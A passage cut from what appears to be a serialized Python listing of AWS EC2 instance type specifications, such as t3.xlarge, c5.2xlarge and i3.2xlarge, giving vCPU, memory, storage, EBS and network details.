'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 
'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 
'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 
347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 
'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 
'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 
'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 
'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 
'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 
'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 200, 'Disks': [{'SizeInGB': 200, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 
'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 200, 'Disks': [{'SizeInGB': 200, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 62464, 'TotalSizeInGB': 1900, 'Disks': [{'SizeInGB': 1900, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1700, 'BaselineThroughputInMBps': 212.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 1700, 'MaximumThroughputInMBps': 212.5, 'MaximumIops': 12000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 
'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 62464}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1900, 'Disks': [{'SizeInGB': 1900, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1700, 'BaselineThroughputInMBps': 212.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 1700, 'MaximumThroughputInMBps': 212.5, 'MaximumIops': 12000}, 'NvmeSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': 
False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'm3.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 
